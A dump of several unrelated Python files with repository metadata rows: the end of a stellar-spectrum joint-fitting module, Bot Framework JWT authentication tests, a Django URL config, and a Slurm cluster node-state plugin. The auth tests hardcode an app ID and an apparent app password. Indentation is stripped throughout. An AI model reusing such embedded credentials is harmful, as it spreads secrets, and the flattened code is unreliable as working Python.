# Step 5) Refit all spectra simultaneously fitting stellar parameters and RVs
if verbose is True:
print(' ')
print('Step #5: Re-fitting all spectra simultaneously')
# Initial guesses for all the parameters, 3 stellar paramters and Nspec relative RVs
initpar2 = out1['pars'][0]
out2, fmodels2 = multifit_lsq_cannon(specmlist,modlist,initpar2)
stelpars2 = out2['pars'][0,0:3]
stelparerr2 = out2['parerr'][0,0:3]
vrel2 = out2['pars'][0,3:]
vrelerr2 = out2['parerr'][0,3:]
vhelio2 = vrel2+info['bc']
medvhelio2 = np.median(vhelio2)
vscatter2 = dln.mad(vhelio2)
verr2 = vscatter2/np.sqrt(nspec)
if verbose is True:
print('Final parameters:')
printpars(stelpars2)
print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio2,verr2))
print('Vscatter = %6.3f km/s' % vscatter2)
print(vhelio2)
# Final output structure
final = info.copy()
final['teff'] = stelpars2[0]
final['tefferr'] = stelparerr2[0]
final['logg'] = stelpars2[1]
final['loggerr'] = stelparerr2[1]
final['feh'] = stelpars2[2]
final['feherr'] = stelparerr2[2]
final['vrel'] = vrel2
final['vrelerr'] = vrelerr2
final['vhelio'] = vhelio2
bmodel = []
totchisq = 0.0
totnpix = 0
for i in range(nspec):
pars1 = [final['teff'][i], final['logg'][i], final['feh'][i]]
vr1 = final['vrel'][i]
sp = specmlist[i]
m = modlist[i](pars1,rv=vr1)
chisq = np.sqrt(np.sum(((sp.flux-m.flux)/sp.err)**2)/(sp.npix*sp.norder))
totchisq += np.sum(((sp.flux-m.flux)/sp.err)**2)
totnpix += sp.npix*sp.norder
final['chisq'][i] = chisq
bmodel.append(m)
totchisq = np.sqrt(totchisq/totnpix)
# Average values
sumdt = np.dtype([('medsnr',float),('totsnr',float),('vhelio',float),('vscatter',float),('verr',float),
('teff',float),('tefferr',float),('logg',float),('loggerr',float),('feh',float),
('feherr',float),('chisq',float)])
sumstr = np.zeros(1,dtype=sumdt)
sumstr['medsnr'] = np.median(info['snr'])
sumstr['totsnr'] = np.sqrt(np.sum(info['snr']**2))
sumstr['vhelio'] = medvhelio2
sumstr['vscatter'] = vscatter2
sumstr['verr'] = verr2
sumstr['teff'] = stelpars2[0]
sumstr['tefferr'] = stelparerr2[0]
sumstr['logg'] = stelpars2[1]
sumstr['loggerr'] = stelparerr2[1]
sumstr['feh'] = stelpars2[2]
sumstr['feherr'] = stelparerr2[2]
sumstr['chisq'] = totchisq
# Save the best-fitting plots
if saveplot is True:
if verbose is True:
print('')
print('Making best-fit plots for each spectrum')
pdfnames = []
specfiles = [s.filename for s in speclist]
for i,f in enumerate(specfiles):
# Figure the output figure filename
fdir,base,ext = utils.splitfilename(speclist[i].filename)
figname = base+'_dopjointfit.png'
if outdir is not None: figname = outdir+'/'+figname
if (outdir is None) & (fdir != ''): figname = fdir+'/'+figname
# Make the plot
spec = speclist[i]
specm = specmlist[i]
fmodel = bmodel[i]
fout = final[i]
# Apply continuum tweak to original spectrum as well
orig = spec.copy()
if orig.normalized is False: orig.normalize()
cratio = specm.cont/orig.cont
orig.flux /= cratio
orig.err /= cratio
orig.cont *= cratio
specfigure(figname,specm,fmodel,fout,original=orig,verbose=True)
# Make a PDF version that we will combine at the end
fignamepdf = figname.replace('.png','.pdf')
specfigure(fignamepdf,specm,fmodel,fout,original=orig,verbose=False)
pdfnames.append(fignamepdf)
# Combine the PDFs into one
fdir,base,ext = utils.splitfilename(specfiles[0])
combname = base+'_dopjointfit_comb.pdf' # png
if outdir is not None: combname = outdir+'/'+combname
if (outdir is None) & (fdir != ''): combname = fdir+'/'+combname
if os.path.exists(combname): os.remove(combname)
cmd = ['gs','-dBATCH','-dNOPAUSE','-q','-sDEVICE=pdfwrite','-sOutputFile='+combname]
cmd = cmd+pdfnames
try:
out = subprocess.call(cmd,stderr=subprocess.STDOUT,shell=False)
if verbose: print('Combined plots saved to '+combname)
except subprocess.CalledProcessError:
raise Exception("Could not combine PDFs with ghostscript")
# Delete individual PDFs
for fp in pdfnames: os.remove(fp)
# How long did this take
if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0))
return sumstr, final, bmodel, specmlist
######################### MAIN PROGRAMS ###########################
def fit(spectrum,models=None,fitparams=None,fixparams={},payne=False,verbose=False,
mcmc=False,figfile=None,cornername=None,retpmodels=False,nthreads=None,
timestamp=False,notweak=False,tpoly=False,tpolyorder=3):
"""
Fit the spectrum. Find the best RV and stellar parameters using the Cannon models.
Parameters
----------
spectrum : Spec1D object
The observed spectrum to match.
models : list of Cannon models or Payne model, optional
A list of Cannon models or a Payne model to use. The default is to load
the models in the data/ directory and use those.
fitparams : list, optional
List of Payne labels to fit.
fixparams : dict, optional
Dictionary of Payne labels to hold fixed.
payne : bool, optional
Fit a Payne model. By default, a Cannon model is used.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is False by default.
figfile : string, optional
The filename for a diagnostic plot showing the observed spectrum, model
spectrum and the best-fit parameters.
cornername : string, optional
The filename for a "corner" plot showing the posterior distributions from
the MCMC run.
retpmodels : bool, optional
Return the prepared models (only if Cannon models used).
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
timestamp : boolean, optional
Add timestamp in verbose output (if verbose=True). Default is False.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
model : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
specm : Spec1D object
The observed spectrum with discrepant and outlier pixels masked.
pmodels : DopplerCannonModelSet
The prepared Doppler Cannon models, only if retpmodels=True.
Example
-------
.. code-block:: python
out, model = fit(spec)
"""
# Set up the logger
if timestamp and verbose:
logger = dln.basiclogger()
logger.handlers[0].setFormatter(logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s"))
logger.handlers[0].setStream(sys.stdout)
builtins.logger = logger # make it available globally across all modules
# Cannon model
if payne == False:
out = fit_cannon(spectrum,models=models,verbose=verbose,mcmc=mcmc,figfile=figfile,
cornername=cornername,retpmodels=retpmodels,nthreads=nthreads,
notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder)
# Payne model
else:
out = fit_payne(spectrum,model=models,fitparams=fitparams,fixparams=fixparams,
verbose=verbose,mcmc=mcmc,figfile=figfile,
cornername=cornername,nthreads=nthreads,
notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder)
# Breakdown logger
if timestamp and verbose:
del builtins.logger
return out
def jointfit(speclist,models=None,fitparams=None,fixparams={},mcmc=False,snrcut=10.0,
saveplot=False,verbose=False,outdir=None,nthreads=None,payne=False,
timestamp=False,notweak=False,tpoly=False,tpolyorder=3):
"""
This fits a Cannon or Payne model to multiple spectra of the same star.
Parameters
----------
speclist : Spec1D object
The observed spectrum to match.
models : Cannon or Payne model(s), optional
A list of Cannon models or Payne model to use. The default is to load all
the Cannon or Payne models (depending on if payne=True is set) in the data/
directory and use those.
fitparams : list, optional
List of Payne labels to fit.
fixparams : dict, optional
Dictionary of Payne labels to hold fixed.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is only run the individual spectra are being fit.
This is False by default.
snrcut : int, optional
S/N cut to fit individual spectra in the first step. The default is snrcut=10.
saveplot : bool, optional
Save output plots.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
outdir : str, optional
The directory for output files. The default is to use the current directory.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
payne : bool, optional
Fit a Payne model. By default, a Cannon model is used.
timestamp : boolean, optional
Add timestamp in verbose output (if verbose=True). Default is False.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
sumstr : numpy structured array
Summary catalog of final best-fit values.
final :
Final best-fit values for each individual spectrum.
bmodel : List of Spec1D object
List of best-fitting model spectra.
specmlist : list of Spec1D object
List of the observed spectrua with discrepant and outlier pixels masked.
Example
-------
.. code-block:: python
sumstr, final, bmodel, specmlist = jointfit(speclist)
"""
# Set up the logger
if timestamp and verbose:
logger = dln.basiclogger()
logger.handlers[0].setFormatter(logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s"))
logger.handlers[0].setStream(sys.stdout)
builtins.logger = logger # make it available globally across all modules
# Cannon model
if payne == False:
out = jointfit_cannon(speclist,models=models,mcmc=mcmc,snrcut=snrcut,
saveplot=saveplot,verbose=verbose,outdir=outdir,
nthreads=nthreads,notweak=notweak,tpoly=tpoly,
tpolyorder=tpolyorder)
# Payne model
else:
out = jointfit_payne(speclist,model=models,fitparams=fitparams,fixparams=fixparams,
mcmc=mcmc,snrcut=snrcut,saveplot=saveplot,verbose=verbose,
outdir=outdir,nthreads=nthreads,notweak=notweak,tpoly=tpoly,
tpolyorder=tpolyorder)
# Breakdown logger
if timestamp and verbose:
del builtins.logger
return out
| 38.698827
| 160
| 0.591468
|
451e90bea550796fa188607b230a6bfea10dd926
| 6,865
|
py
|
Python
|
libraries/botframework-connector/tests/test_auth.py
|
awaemmanuel/botbuilder-python
|
bcc85a49f1426ccf682205566fd03937ee6d315c
|
[
"MIT"
] | 1
|
2019-05-31T10:55:15.000Z
|
2019-05-31T10:55:15.000Z
|
libraries/botframework-connector/tests/test_auth.py
|
awaemmanuel/botbuilder-python
|
bcc85a49f1426ccf682205566fd03937ee6d315c
|
[
"MIT"
] | null | null | null |
libraries/botframework-connector/tests/test_auth.py
|
awaemmanuel/botbuilder-python
|
bcc85a49f1426ccf682205566fd03937ee6d315c
|
[
"MIT"
] | null | null | null |
import pytest
from botbuilder.schema import Activity
from botframework.connector.auth import JwtTokenValidation
from botframework.connector.auth import SimpleCredentialProvider
from botframework.connector.auth import EmulatorValidation
from botframework.connector.auth import ChannelValidation
from botframework.connector.auth import MicrosoftAppCredentials
class TestAuth:
EmulatorValidation.TO_BOT_FROM_EMULATOR_TOKEN_VALIDATION_PARAMETERS.ignore_expiration = True
ChannelValidation.TO_BOT_FROM_CHANNEL_TOKEN_VALIDATION_PARAMETERS.ignore_expiration = True
@pytest.mark.asyncio
async def test_connector_auth_header_correct_app_id_and_service_url_should_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '')
result = await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/')
assert result
@pytest.mark.asyncio
async def test_connector_auth_header_with_different_bot_app_id_should_not_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('00000000-0000-0000-0000-000000000000', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/')
assert 'Unauthorized' in str(excinfo.value)
@pytest.mark.asyncio
async def test_connector_auth_header_and_no_credential_should_not_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/')
assert 'Unauthorized' in str(excinfo.value)
@pytest.mark.asyncio
async def test_empty_header_and_no_credential_should_validate(self):
header = ''
credentials = SimpleCredentialProvider('', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.validate_auth_header(header, credentials, '', None)
assert 'auth_header' in str(excinfo.value)
@pytest.mark.asyncio
async def test_emulator_msa_header_correct_app_id_and_service_url_should_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '')
result = await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/')
assert result
@pytest.mark.asyncio
async def test_emulator_msa_header_and_no_credential_should_not_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('00000000-0000-0000-0000-000000000000', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.validate_auth_header(header, credentials, '', None)
assert 'Unauthorized' in excinfo
@pytest.mark.asyncio
# Tests with a valid Token and service url; and ensures that Service url is added to Trusted service url list.
async def test_channel_msa_header_Valid_service_url_should_be_trusted(self):
activity = Activity(service_url = 'https://smba.trafficmanager.net/amer-client-ss.msg/')
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '')
await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert MicrosoftAppCredentials.is_trusted_service('https://smba.trafficmanager.net/amer-client-ss.msg/')
@pytest.mark.asyncio
async def test_channel_msa_header_from_user_specified_tenant(self):
activity = Activity(service_url = 'https://smba.trafficmanager.net/amer-client-ss.msg/')
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F', 'microsoft.com').get_access_token(True)
credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '')
claims = await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert claims.get_claim_value("tid") == '72f988bf-86f1-41af-91ab-2d7cd011db47'
@pytest.mark.asyncio
# Tests with a valid Token and invalid service url; and ensures that Service url is NOT added to Trusted service url list.
async def test_channel_msa_header_invalid_service_url_should_not_be_trusted(self):
activity = Activity(service_url = 'https://webchat.botframework.com/')
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('7f74513e-6f96-4dbc-be9d-9a81fea22b88', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert 'Unauthorized' in str(excinfo.value)
assert not MicrosoftAppCredentials.is_trusted_service('https://webchat.botframework.com/')
@pytest.mark.asyncio
# Tests with no authentication header and makes sure the service URL is not added to the trusted list.
async def test_channel_authentication_disabled_should_be_anonymous(self):
activity = Activity(service_url = 'https://webchat.botframework.com/')
header = ''
credentials = SimpleCredentialProvider('', '')
claimsPrincipal = await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert claimsPrincipal == None
@pytest.mark.asyncio
# Tests with no authentication header and makes sure the service URL is not added to the trusted list.
async def test_channel_authentication_disabled_service_url_should_not_be_trusted(self):
activity = Activity(service_url = 'https://webchat.botframework.com/')
header = ''
credentials = SimpleCredentialProvider('', '')
await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert not MicrosoftAppCredentials.is_trusted_service('https://webchat.botframework.com/')
| 58.675214
| 158
| 0.75295
|
4c056a7c6bfe871f925cd90d9aab06e383ec131b
| 339
|
py
|
Python
|
superadmin/urls.py
|
nkmrohit/python
|
bd644d51909cda548684b5da98eab998564f3568
|
[
"Apache-2.0"
] | null | null | null |
superadmin/urls.py
|
nkmrohit/python
|
bd644d51909cda548684b5da98eab998564f3568
|
[
"Apache-2.0"
] | null | null | null |
superadmin/urls.py
|
nkmrohit/python
|
bd644d51909cda548684b5da98eab998564f3568
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from django.conf.urls import include, url
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
import authUser.views
urlpatterns = [
url('auth/', include('adminauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 21.1875
| 65
| 0.769912
|
8ff42132c461b74eb57d15e0f6df1f38c7d55644
| 20,290
|
py
|
Python
|
src/slurm_plugin/slurm_resources.py
|
lukeseawalker/cfncluster-node
|
0c7619a6440a5848a1d0bb3ff88c33b197055a48
|
[
"Apache-2.0"
] | 33
|
2018-11-14T14:54:47.000Z
|
2022-03-22T23:47:51.000Z
|
src/slurm_plugin/slurm_resources.py
|
gmarciani/aws-parallelcluster-node
|
ab77de979f429676ef228a49fecd3cf28a6eec4c
|
[
"Apache-2.0"
] | 180
|
2019-02-21T09:33:10.000Z
|
2022-03-31T08:01:28.000Z
|
src/slurm_plugin/slurm_resources.py
|
gmarciani/aws-parallelcluster-node
|
ab77de979f429676ef228a49fecd3cf28a6eec4c
|
[
"Apache-2.0"
] | 35
|
2019-02-06T13:36:18.000Z
|
2022-03-01T12:54:05.000Z
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
from abc import ABCMeta, abstractmethod
from enum import Enum
from common.utils import time_is_up
logger = logging.getLogger(__name__)
# Possible ec2 health status: 'ok'|'impaired'|'insufficient-data'|'not-applicable'|'initializing'
EC2_HEALTH_STATUS_UNHEALTHY_STATES = {"impaired"}
# Possible instance states: 'pending'|'running'|'shutting-down'|'terminated'|'stopping'|'stopped'
EC2_INSTANCE_HEALTHY_STATES = {"pending", "running"}
EC2_INSTANCE_STOP_STATES = {"stopping", "stopped"}
EC2_INSTANCE_ALIVE_STATES = EC2_INSTANCE_HEALTHY_STATES | EC2_INSTANCE_STOP_STATES
EC2_SCHEDULED_EVENT_CODES = [
"instance-reboot",
"system-reboot",
"system-maintenance",
"instance-retirement",
"instance-stop",
]
CONFIG_FILE_DIR = "/etc/parallelcluster/slurm_plugin"
class EC2Instance:
def __init__(self, id, private_ip, hostname, launch_time):
"""Initialize slurm node with attributes."""
self.id = id
self.private_ip = private_ip
self.hostname = hostname
self.launch_time = launch_time
self.slurm_node = None
def __eq__(self, other):
"""Compare 2 SlurmNode objects."""
if isinstance(other, EC2Instance):
return self.__dict__ == other.__dict__
return False
def __repr__(self):
attrs = ", ".join(["{key}={value}".format(key=key, value=repr(value)) for key, value in self.__dict__.items()])
return "{class_name}({attrs})".format(class_name=self.__class__.__name__, attrs=attrs)
def __str__(self):
return f"{self.id}"
def __hash__(self):
return hash(self.id)
class PartitionStatus(Enum):
UP = "UP"
DOWN = "DOWN"
INACTIVE = "INACTIVE"
DRAIN = "DRAIN"
def __str__(self):
return str(self.value)
class SlurmPartition:
def __init__(self, name, nodenames, state):
"""Initialize slurm partition with attributes."""
self.name = name
self.nodenames = nodenames
self.state = state
self.slurm_nodes = []
def is_inactive(self):
return self.state == "INACTIVE"
def has_running_job(self):
return any(node.is_running_job() for node in self.slurm_nodes)
def get_online_node_by_type(self, terminate_drain_nodes, terminate_down_nodes):
online_compute_resources = set()
if not self.state == "INACTIVE":
for node in self.slurm_nodes:
if (
node.is_healthy(terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=False)
and node.is_online()
):
logger.debug("Currently online node: %s, node state: %s", node.name, node.state_string)
online_compute_resources.add(node.get_compute_resource_name())
return online_compute_resources
def __eq__(self, other):
"""Compare 2 SlurmPartition objects."""
if isinstance(other, SlurmPartition):
return self.__dict__ == other.__dict__
return False
class SlurmNode(metaclass=ABCMeta):
SLURM_SCONTROL_BUSY_STATES = {"MIXED", "ALLOCATED", "COMPLETING"}
SLURM_SCONTROL_IDLE_STATE = "IDLE"
SLURM_SCONTROL_DOWN_STATE = "DOWN"
SLURM_SCONTROL_DRAIN_STATE = "DRAIN"
SLURM_SCONTROL_POWERING_DOWN_STATES = {"POWERING_DOWN", "POWER_DOWN"}
SLURM_SCONTROL_POWER_STATE = {"IDLE", "CLOUD", "POWERED_DOWN"}
SLURM_SCONTROL_POWER_UP_STATE = "POWERING_UP"
SLURM_SCONTROL_ONLINE_STATES = {"IDLE+CLOUD", "MIXED+CLOUD", "ALLOCATED+CLOUD", "COMPLETING+CLOUD"}
SLURM_SCONTROL_POWER_WITH_JOB_STATE = {"MIXED", "CLOUD", "POWERED_DOWN"}
SLURM_SCONTROL_RESUME_FAILED_STATE = {"DOWN", "CLOUD", "POWERED_DOWN", "NOT_RESPONDING"}
def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None):
"""Initialize slurm node with attributes."""
self.name = name
self.nodeaddr = nodeaddr
self.nodehostname = nodehostname
self.state_string = state
self.states = set(state.split("+"))
self.partitions = partitions.strip().split(",") if partitions else None
self.instance = instance
self.is_static_nodes_in_replacement = False
self._is_being_replaced = False
self._is_replacement_timeout = False
self.is_failing_health_check = False
def is_nodeaddr_set(self):
"""Check if nodeaddr(private ip) for the node is set."""
return self.nodeaddr != self.name
def has_job(self):
"""Check if slurm node is in a working state."""
return any(working_state in self.states for working_state in self.SLURM_SCONTROL_BUSY_STATES)
def _is_drain(self):
"""Check if slurm node is in any drain(draining, drained) states."""
return self.SLURM_SCONTROL_DRAIN_STATE in self.states
def is_drained(self):
"""
Check if slurm node is in drained state.
drained(sinfo) is equivalent to IDLE+DRAIN(scontrol) or DOWN+DRAIN(scontrol)
"""
return self._is_drain() and (self.SLURM_SCONTROL_IDLE_STATE in self.states or self.is_down())
def is_powering_down(self):
"""Check if slurm node is in powering down state."""
return any(
powering_down_state in self.states for powering_down_state in self.SLURM_SCONTROL_POWERING_DOWN_STATES
)
def is_power(self):
"""Check if slurm node is in power state."""
return self.SLURM_SCONTROL_POWER_STATE == self.states
def is_down(self):
"""Check if slurm node is in a down state."""
return self.SLURM_SCONTROL_DOWN_STATE in self.states and not self.is_powering_down()
def is_up(self):
"""Check if slurm node is in a healthy state."""
return not self._is_drain() and not self.is_down() and not self.is_powering_down()
def is_powering_up(self):
"""Check if slurm node is in powering up state."""
return self.SLURM_SCONTROL_POWER_UP_STATE in self.states
def is_online(self):
"""Check if slurm node is online with backing instance."""
return self.state_string in self.SLURM_SCONTROL_ONLINE_STATES
def is_configuring_job(self):
"""Check if slurm node is configuring with job and haven't begun to run a job."""
return self.is_powering_up() and self.has_job()
def is_power_with_job(self):
"""Dynamic nodes allocated a job but power up process has not started yet."""
return self.states == self.SLURM_SCONTROL_POWER_WITH_JOB_STATE
def is_running_job(self):
"""Check if slurm node is running a job but not in configuring job state."""
return not self.is_powering_up() and self.has_job() and not self.is_power_with_job()
def is_resume_failed(self):
"""Check if node resume timeout expires."""
return self.states == self.SLURM_SCONTROL_RESUME_FAILED_STATE
def is_poweing_up_idle(self):
"""Check if node is in IDLE# state."""
return self.SLURM_SCONTROL_IDLE_STATE in self.states and self.is_powering_up()
@abstractmethod
def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node's scheduler state is considered healthy."""
pass
@abstractmethod
def is_bootstrap_failure(self):
"""
Check if a slurm node has boostrap failure.
Here's the cases of bootstrap error we are checking:
Bootstrap error that causes instance to self terminate.
Bootstrap error that prevents instance from joining cluster but does not cause self termination.
"""
pass
@abstractmethod
def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node is considered healthy."""
pass
@abstractmethod
def is_powering_down_with_nodeaddr(self):
"""Check if a slurm node is a powering down node with instance backing."""
pass
def is_backing_instance_valid(self, log_warn_if_unhealthy=True):
"""Check if a slurm node's addr is set, it points to a valid instance in EC2."""
if self.is_nodeaddr_set():
if not self.instance:
if log_warn_if_unhealthy:
logger.warning(
"Node state check: no corresponding instance in EC2 for node %s, node state: %s",
self,
self.state_string,
)
return False
return True
@abstractmethod
def needs_reset_when_inactive(self):
"""Check if the node need to be reset if node is inactive."""
pass
def get_compute_resource_name(self):
"""Get instance name of given node."""
_, _, compute_resource_name = parse_nodename(self.name)
return compute_resource_name
def __eq__(self, other):
"""Compare 2 SlurmNode objects."""
if isinstance(other, SlurmNode):
return self.__dict__ == other.__dict__
return False
def __repr__(self):
attrs = ", ".join(["{key}={value}".format(key=key, value=repr(value)) for key, value in self.__dict__.items()])
return "{class_name}({attrs})".format(class_name=self.__class__.__name__, attrs=attrs)
def __str__(self):
return f"{self.name}({self.nodeaddr})"
def __hash__(self):
return hash(self.name)
class StaticNode(SlurmNode):
def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None):
"""Initialize slurm node with attributes."""
super().__init__(name, nodeaddr, nodehostname, state, partitions, instance)
def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node is considered healthy."""
return (
self._is_static_node_configuration_valid(log_warn_if_unhealthy=log_warn_if_unhealthy)
and self.is_backing_instance_valid(log_warn_if_unhealthy=log_warn_if_unhealthy)
and self.is_state_healthy(
terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=log_warn_if_unhealthy
)
)
def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node's scheduler state is considered healthy."""
# Check to see if node is in DRAINED, ignoring any node currently being replaced
if self.is_drained() and terminate_drain_nodes:
if self._is_being_replaced:
logger.debug(
"Node state check: node %s in DRAINED but is currently being replaced, ignoring, node state: %s",
self,
self.state_string,
)
return True
else:
if log_warn_if_unhealthy:
logger.warning("Node state check: node %s in DRAINED, node state: %s", self, self.state_string)
return False
# Check to see if node is in DOWN, ignoring any node currently being replaced
elif self.is_down() and terminate_down_nodes:
if self._is_being_replaced:
logger.debug(
"Node state check: node %s in DOWN but is currently being replaced, ignoring. Node state: ",
self,
self.state_string,
)
return True
else:
if log_warn_if_unhealthy:
logger.warning("Node state check: node %s in DOWN, node state: %s", self, self.state_string)
return False
return True
def _is_static_node_configuration_valid(self, log_warn_if_unhealthy=True):
"""Check if static node is configured with a private IP."""
if not self.is_nodeaddr_set():
if log_warn_if_unhealthy:
logger.warning(
"Node state check: static node without nodeaddr set, node %s, node state %s:",
self,
self.state_string,
)
return False
return True
def is_bootstrap_failure(self):
"""Check if a slurm node has boostrap failure."""
if self.is_static_nodes_in_replacement and not self.is_backing_instance_valid(log_warn_if_unhealthy=False):
# Node is currently in replacement and no backing instance
logger.warning(
"Node bootstrap error: Node %s is currently in replacement and no backing instance, node state %s:",
self,
self.state_string,
)
return True
# Replacement timeout expires for node in replacement
elif self._is_replacement_timeout:
logger.warning(
"Node bootstrap error: Replacement timeout expires for node %s in replacement, node state %s:",
self,
self.state_string,
)
return True
elif self.is_failing_health_check and self.is_static_nodes_in_replacement:
logger.warning(
"Node bootstrap error: Node %s failed during bootstrap when performing health check, node state %s:",
self,
self.state_string,
)
return True
return False
def is_powering_down_with_nodeaddr(self):
"""Check if a slurm node is a powering down node with instance backing. Static node will not powering down."""
return False
def needs_reset_when_inactive(self):
"""Check if the node need to be reset if node is inactive."""
return self.is_nodeaddr_set()
class DynamicNode(SlurmNode):
def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None):
"""Initialize slurm node with attributes."""
super().__init__(name, nodeaddr, nodehostname, state, partitions, instance)
def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node's scheduler state is considered healthy."""
# Check to see if node is in DRAINED, ignoring any node currently being replaced
if self.is_drained() and terminate_drain_nodes:
if log_warn_if_unhealthy:
logger.warning("Node state check: node %s in DRAINED, node state: %s", self, self.state_string)
return False
# Check to see if node is in DOWN, ignoring any node currently being replaced
elif self.is_down() and terminate_down_nodes:
if not self.is_nodeaddr_set():
# Silently handle failed to launch dynamic node to clean up normal logging
logger.debug("Node state check: node %s in DOWN, node state: %s", self, self.state_string)
else:
if log_warn_if_unhealthy:
logger.warning("Node state check: node %s in DOWN, node state: %s", self, self.state_string)
return False
return True
def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node is considered healthy."""
return self.is_backing_instance_valid(log_warn_if_unhealthy=log_warn_if_unhealthy) and self.is_state_healthy(
terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=log_warn_if_unhealthy
)
def is_bootstrap_failure(self):
"""Check if a slurm node has boostrap failure."""
# no backing instance + [working state]# in node state
if (self.is_configuring_job() or self.is_poweing_up_idle()) and not self.is_backing_instance_valid(
log_warn_if_unhealthy=False
):
logger.warning(
"Node bootstrap error: Node %s is in power up state without valid backing instance, node state: %s",
self,
self.state_string,
)
return True
# Dynamic node in DOWN+CLOUD+POWERED_DOWN+NOT_RESPONDING state
elif self.is_resume_failed() and self.is_nodeaddr_set():
# We need to check if nodeaddr is set to avoid counting powering up nodes as bootstrap failure nodes during
# cluster start/stop.
logger.warning(
"Node bootstrap error: Resume timeout expires for node %s, node state: %s", self, self.state_string
)
return True
elif self.is_failing_health_check and self.is_powering_up():
logger.warning(
"Node bootstrap error: Node %s failed during bootstrap when performing health check, node state: %s",
self,
self.state_string,
)
return True
return False
def is_powering_down_with_nodeaddr(self):
"""Check if a slurm node is a powering down node with instance backing."""
return self.is_nodeaddr_set() and (self.is_power() or self.is_powering_down())
